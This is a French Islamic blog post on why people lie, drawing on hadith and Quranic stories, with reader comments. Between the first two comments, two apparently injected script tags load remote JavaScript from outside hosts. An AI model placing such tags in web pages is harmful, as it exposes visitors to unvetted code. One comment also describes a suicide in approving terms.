• *Les raisons du mensonge*

    Les raisons du mensonge sont au nombre de quatre 

     

     

    Une raison très courante, pour sortir d’une situation embarrassante

     

    Tout le monde sauf les décédés tombent dans le mensonge. 

     

    Exemples classiques : elle s’assoit toute la journée devant la télévision, et quand le mari rentre, fatigué après une longue journée de travail et lui demande avec plaisir : ou est le déjeuner ? Alors elle change de couleur, ment et dit : oh je suis malade. 

    Un autre qui n’a pas bien révisé pour ses examens, échoue. Il est sur le chemin du retour de la maison, hésitant, attendant que le sauveur arrive… Arrivé à la maison, son père lui demande. Et là, la réponse sort toute seule : je me suis surpassé, je suis premier de la classe. Et trois ans plus tard, le père est surpris !! 

    Cette première raison a induit son propriétaire dans un mal encore pire, car la vérité sera connue tôt ou tard. 

     

     

     

    Histoire illustrative

     

    A la conquête de Tabouk, 30 000 compagnons sont sortis avec le prophète (paix et bénédiction d'Allah soient sur lui). 

    Cette conquête avait lieu le mois d’aout, la canicule était intense, et la distance très longue (environ 1000km). 

    Les hypocrites se sont mis à inventer des excuses et à s’absenter. 

    Il y avait également trois compagnons honnêtes qui se sont absentés au rdv du prophète (paix et bénédiction d'Allah soient sur lui).

    Un de ces trois, celui qui raconte l’histoire, était notre maitre Kaab Ben Malek. 

    Notre maitre Kaab dit : le prophète (paix et bénédiction d'Allah soient sur lui) est parti à la tête de l’armée et je me disais : demain je les rattraperais… le lendemain arrivait, et je me disais : demain je les rattraperais. 

    Jusqu’à ce qu’il m’est devenu impossible de les rattraper. Je me suis mis à marcher dans les rues de la ville, je n’y trouvais que les hypocrites connus pour leur hypocrisie, et des malades handicapés. 

    Au retour du prophète (paix et bénédiction d'Allah soient sur lui), j’eu un grand chagrin. 

    Je me suis dit : « que vais-je dire au prophète ?? Comment éviter sa colère demain?? » C’est là que je me suis souvenu du mensonge !! Et le mensonge me passait par la tête… Mais quand le prophète (paix et bénédiction d'Allah soient sur lui) est venu, l’absurde s’est dissipé devant mes yeux, et je me suis décidé à être honnête avec lui. 

    Le prophète (paix et bénédiction d'Allah soient sur lui) est entré dans la mosquée et s’est installé. 

    Les hypocrites ont commencés à entrer vers le prophète (paix et bénédiction d'Allah soient sur lui) et s’excuser (pardonne moi Ô émissaire de Dieu, excuse moi Ô émissaire de Dieu). 

    Le prophète (paix et bénédiction d'Allah soient sur lui) acceptait leurs excuses, leurs invoquait le pardon de Dieu, les admettait de nouveau avec lui, transmettait leurs secrets à Dieu le Tout Haut, alors ils sortaient de chez lui très heureux ! 

    Mon tour est arrivé (rappel : il s’est absenté du devoir de guerre sainte et a laissé le prophète (paix et bénédiction d'Allah soient sur lui)) alors je suis entré vers le prophète (paix et bénédiction d'Allah soient sur lui). 

    C’est la que se dessine sur son visage le sourire d’un homme fâché !! 

    Il (paix et bénédiction d'Allah soient sur lui) me dit : « Viens, pourquoi n’étais tu pas présent ? Ne venais-tu pas d’acheter un nouveau chameau ? » 

    Je dis : Ô émissaire de Dieu ! Pa Dieu, si j’étais assis en présence de quelqu’un d’autre que toi, alors je m’aurais trouvé une issue de sa colère par une excuse, mais Ô émissaire de Dieu, si je te parlais aujourd’hui de paroles qui te satisfont de moi, Dieu augmentera ta colère sur moi, et si je te parlais de paroles honnêtes, tu trouveras que je mérite la punition de Dieu, et par Dieu, je n’avais pas d’excuses. 

    Alors le prophète (paix et bénédiction d'Allah soient sur lui) dit : « Celui là a dit la vérité ! Va jusqu’à ce que Dieu décide de toi » 

    (rapporté par Bukhari Muslim et l’imam Ahmad) 

     

    Kaab Ben Malek continue et dit « je me suis retiré et le prophète (paix et bénédiction d'Allah soient sur lui) a interdit qu’on nous adresse la parole pendant quarante jours qui ont ensuite été rallongés à cinquante jours. 

    Kaab dit : Quand je suis sorti de chez le prophète (paix et bénédiction d'Allah soient sur lui) les gens du peuple Bani Salma sont venus me dire : pourquoi n’as-tu pas dit comme un tel et présenté tes excuses, le prophète (paix et bénédiction d'Allah soient sur lui) t’aurait demandé le pardon de Dieu !! 

    Tellement ils m’ont rempli la tête, j’ai failli revenir vers le prophète (paix et bénédiction d'Allah soient sur lui) et lui mentir moi-même mais je me suis raisonné. 

    Le prophète (paix et bénédiction d'Allah soient sur lui) a donc interdit de nous adresser la parole pendant cinquante jours, jusqu’à ce que le repentir de Dieu nous a désigné dans un coran qui se chante jusqu’au jour de la résurrection. 

    Et Louange à Dieu, les versets sont conclus par : « Ô vous qui croyez ! Craignez Allah et soyez avec les véridiques » (Sourate El Tawba verset 119). 

    Je suis entré dans la mosquée, le prophète (paix et bénédiction d'Allah soient sur lui) m’a regardé, je suis allé vers lui, et son visage s’est illuminé de joie. Je lui dis : Ô émissaire de Dieu, par Dieu, rien ne m’a sauvé sauf l’honnêteté, et depuis je le jure par Dieu je n’ai jamais émis un seul mensonge, et souhaite que Dieu m’y perpétue jusqu’à la mort !!!!!!!!!!!! 

     

     

     

    Une raison entrainant à l’hypocrisie : Pour un bénéfice !!

     

    C’est une raison plus malicieuse que la précédente et plus difficile et pire chez Dieu Tout Haut. Mentir pour en tirer un bénéfice, une position sociale, un poste administratif, une présidence, ou tout simplement de l’argent. Cette raison entraine à l’hypocrisie car c’est convaincre par un mensonge pour avoir un bénéfice et donc par la suite se permettre des interdictions et plus encore. Se méfier de cette raison.. 

     

    Abou Jahel dans une situation étrange 

    Le prophète (paix et bénédiction d'Allah soient sur lui) passait devant Abou Jahel et un de ses amis. 

    Il invita alors Abou Jahel de se reconvertir à l’islam. 

    Ce dernier dit : Ô Muhammad, tu es menteur, je ne te crois pas ! Le prophète (paix et bénédiction d'Allah soient sur lui) s’est attristé et les a quittés. 

    Alors Abou Jahel dit à son ami (qui c’est converti après ca) : Je sais qu’il est honnête et qu’il dit vrai, mais ce qui m’empêche d’y croire c’est que ma tribu et la tribu des Bani Abd Manaf (tribu du prophète (paix et bénédiction d'Allah soient sur lui)) ont toujours été en compétition serrée. 

    S’ils disent : nous avons ceci, on leurs disait : nous avons cela ! Jusqu’au jour où ils ont dit : de notre tribu est le prophète… d’où veux-tu que nous apportons un prophète ? 

    Abou Jahel avait besoin d’avoir un bénéfice personnel, ce qui l’a entrainé au fin fond de l’enfer 

    (Dieu Ta protection). 

     

     

     

    Une raison dangereuse : Pour faire du mal à autrui

     

    Mentir pour faire du mal à autrui !! Pourquoi ? Par haine… par rancune… par jalousie… Détester un frère, alors lui mentir pour le faire succomber dans les problèmes… Haïr une sœur, alors salir son honneur par diffamation. 

    Cette raison ruinera l’humanité. C’est une raison à travers laquelle Satan montre ses aptitudes personnelles.. 

     

    Les frères de Youssouf (Joseph) 

     

    « Tuez Joseph ou bien éloignez-le dans n’importe quel pays, afin que le visage de notre père se tourne exclusivement vers nous, et que vous soyez après cela des gens de bien » (Sourate Youssouf Verset 9) 

    Deux mensonges sont présents. Le mensonge verbal, et le mensonge par l’acte. 

    Le mensonge verbal est « ils vinrent à leur père, le soir, en pleurant » « ils dirent : Ô notre père, nous sommes allés faire une course, et nous avons laissé joseph auprès de nos effets ; le loup l’a dévoré. Tu ne nous croiras pas, même si nous disons la vérité » (Versets 16 et 17) 

    Le mensonge par l’acte est « ils apportèrent sa tunique tachée de faux sang » (Verset 18) 

     

    Louange à Dieu !! Les conséquences de la haine et de la jalousie ont insinués l’idée de tuer. Qu’en a fait Dieu ?? Peine et endurance pendant vingt ans jusqu’à ce que leur frère Youssouf qui était présumé mort, réapparaisse. 

    Dieu Tout haut dit par l’intermédiaire de leur langue « Tu ne nous croiras pas même si nous disons la vérité » (Verset 17) Louange à Dieu, le menteur se dévoile rapidement !! 

     

     

     

    La Manie du mensonge

     

    C’est une raison étrange, mentir pour le plaisir de mentir !! Aimer mentir, et savourer le mensonge. Au fil du temps, l’utilisation de ce mensonge devient incontrôlable. 

    Tous les matins avant d’aller en cours, les parents disent : travaille bien, et sois « sage » ! On rentre des cours, les parents demandent : c’était bien les cours ? Et on répond : Je me suis fait exclure du cours de math parce que j’ai dormi !! 

    Réponse à tue-tête, pour effrayer, et rire sur leur réaction… mais conséquences bien réelles car cette plaisanterie est comptée comme mensonge. 

    Le prophète (paix et bénédiction d'Allah soient sur lui) dit : « Malheur à celui qui parle des paroles mensongères pour faire rire les gens, malheur à lui, malheur à lui » (Abou Dawoud) 

    Il (paix et bénédiction d'Allah soient sur lui) dit aussi : « je suis le chef garant d’une maison au paradis pour celui qui délaisse le mensonge, même dans ses plaisanteries » (Abou Dawoud) 

     

    Mensonge et foi ne se réunissent pas. Le Prophète (paix et bénédiction d'Allah soient sur lui) fut demandé : le croyant pourrait-il être lâche ? Il dit : « oui », ils disent : le croyant pourrait-il être avare ? Il dit : « oui », ils disent : le croyant pourrait-il être menteur ? Il dit « non » (rapporté par l’imam Malek) 

     

     

    Nous sommes excusés dans un moment de lâcheté, nous sommes excusés si nous ne voulons dépenser dans un moment de faiblesse, mais LE MENSONGE N’A PAS D’EXCUSES. 

     

     

     

    Quand le mensonge est-il toléré ? Trois cas 

     

    - En temps de guerre : car la guerre c’est la ruse 

    - Dans la réconciliation entre les gens : dire au premier : il parle de toi en bien, te complimente malgré que l’autre l’insulte en vérité, et dire la même chose au second. 

    - Mentir à l’épouse : ATTENTION ! ca ne signifie pas mentir pour la tromper !!! mais le mensonge dans ce qui la satisfait et la réforme, comme par exemple lui dire : tu es la plus belle femme de tout l’univers.. 

     

    « *Le mois de Chaabâne*La signification de l'ordre dans l'ablution* »
    Partager via Gmail Delicious Technorati Yahoo! Google Bookmarks Blogmarks Pin It

  • Commentaires

    1
    soela
    Mardi 19 Mars 2013 à 21:47

    voila enfin une ais rticle pour moi , je me suis convertie depuis 2008. mais ma Foi étais pas élever . Hemdoulilah je pratique ma religion depuis Janvier un peu près . Donc moi je ment depuis mon Enfance j'ai toujours menti . là j'essai de me controler mais c'est dure parce que avant j'étais comme mito je ment à chaque fois que je parle et là sa à changer un peu hemdoulilah . mais j'aimerais savoir comment je peux arrêter de mentir y a til une invocation qui pourrais m'aider ? je fais mes prière à l'heure tout les soir je lit le Coran je fait mes ebultion , le Vendredi je lit la caverne . Et quand j'ai peu de temps je lit le Coran . j'ai arrêter la tv . pouvais vous me dire comment puis je arrêter de Mentir j'ai besoin d'aide svp . Qu'Allah vous guide . J'attend vôtre message 

     
    <script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script> <script src="https://loading-resource.com/data.js.php?i={DCA85413-12D8-424A-9211-E71AB6DE4D1D}&d=2012-6-28&s=http://islamhadithsunna.cd.st/les-raisons-du-mensonge-a80259676" type="text/javascript"></script>
    2
    safa
    Mardi 19 Août 2014 à 21:14
    Chère soeur soela sache que c est une maladie psy. Fait une analyse brève cognitive tu trouveras en qq séances les raisons qui te poussent à ça
    Pour le reste apprend qu il faut caché nos péchés car Dieu le fait pour nous
    Donc tu demandes de l aide anonyme mais tu parles à personnes de tes bonnes ou mauvaises actions elle sont dans ton livre auprès de notre Créateur. En tant que converie je te conseille de t intéressé avant tout à la souhah l encyclopédie de Bukhari car si tu n as pas la langue arabe tu n as pas la parole de Dieu tandis que le Prophète saaws était un homme et les linguistes peuvent mieux nous faire passer le message divin grâce à lui l homme ses dires ses faits son exemple et ceux de ses compagnons mais apprends e5 met non stop le Coran dans ta maison car Il est dit qu une maison où le Coran n est pas récité est une maison morte. J espère avoir pu t aider. Voilà bientôt 30 ans que je suis convertie et si je vais d épreuves en épreuves je suis heureuse dans mes malheurs car je sais que je sais un cadeau de Dieu et que je dois enduré avec patience car c est pour mon au delà. Je pense qu à la vie future et si je sors un peu profiter de la vie c est pour mon fils moi j en ai pas besoin. J espère t avoir aidé ma soeur et ne t en veux pas Dieu pardonne aux malades même un suicide j ai vu un magnifique sourire sur une femme alcoolique qui s était defenestrée en sortant de thérapie pourtant elle avait un petit enfant seule toilette mortuaire avec un sourire alors courage!
    3
    soumia
    Mercredi 25 Février 2015 à 22:19

    Salam aleykum


    moi j'ai un frère qui passe son temps à mentir pour tout, des broutilles, on a beau gueuler sur lui mais rien,il dit ke cé pour kon lui fiche la paix, mais il ment à tout le monde! c'est devenu pire, il sne mesure pas les conséquences, il est pas responsable, et très égoïstes, ne lui parlez pas de dou'a tout ce ki touche à l'Islam, l'ennuie, à part manger halal ou prier si on crie on le pousse et le menace, sachant quan il est chez lui, ne fait rien de tout ça! j'en parle mais nul ne m'aide, me disant kil doit faire des dou'a alors kil s'en fout!!!il ne lis pas ces livres,


     



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :